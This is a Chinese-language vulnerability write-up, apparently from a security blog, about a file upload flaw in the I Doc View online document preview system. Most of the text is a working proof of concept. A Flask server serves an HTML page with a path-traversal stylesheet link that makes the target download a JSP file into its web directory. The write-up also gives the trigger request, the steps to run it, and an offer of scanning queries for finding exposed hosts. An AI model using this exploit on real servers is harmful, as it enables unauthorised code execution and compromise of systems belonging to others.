本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
I Doc View在线文档预览系统是一套用于在Web环境中展示和预览各种文档类型的系统,如文本文档、电子表格、演示文稿、PDF文件等。
开发语言:Java
开发厂商:北京卓软在线信息技术有限公司
漏洞描述
I Doc View在线文档预览系统“/html/2word”的参数“url”存在文件上传漏洞,该漏洞存在于I Doc View的远程页面缓存功能中。由于应用程序无法完全验证用户输入URL的安全性,攻击者可以构建特殊的URL,使服务器下载恶意文件并执行任意代码。
影响版本
iDocView < 13.10.1_20231115
空间测绘
回复“CVE-2023-23743”获取空间测绘语句
漏洞利用
# python代码
from flask import Flask
import argparse
parse = argparse.ArgumentParser()
parse.add_argument("-port", type=int, help="Save port.", default=8989)
args = parse.parse_args()
app = Flask(__name__)
@app.route('/index.html')
def index():
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>title</title>
<link rel="stylesheet" href="..\\..\\..\\docview\\aaaa.jsp">
</head>
<body>
</body>
</html>"""
@app.route('/..\\..\\..\\docview\\aaaa.jsp')
def jsp_file():
return '''<%
out.print("This is a vul test!");
%>'''
if __name__ == '__main__':
app.run(host="0.0.0.0", port=args.port)
# 利用POC
/html/2word?url=http://yyy.yyy.yyy:8989/index.html
在公网服务器运行python脚本
python poc.py -port 8989
2.向目标发送请求(xxx.xxx.xxx为目标公网IP或域名,yyy.yyy.yyy为服务器公网IP或域名)
http://xxx.xxx.xxx/html/2word?url=http://yyy.yyy.yyy:8989/index.html
服务器收到请求。
文件上传成功。
参考链接
https://buaq.net/go-199519.html
https://zhuanlan.zhihu.com/p/668379259
回复“CVE-2023-23743”获取空间测绘语句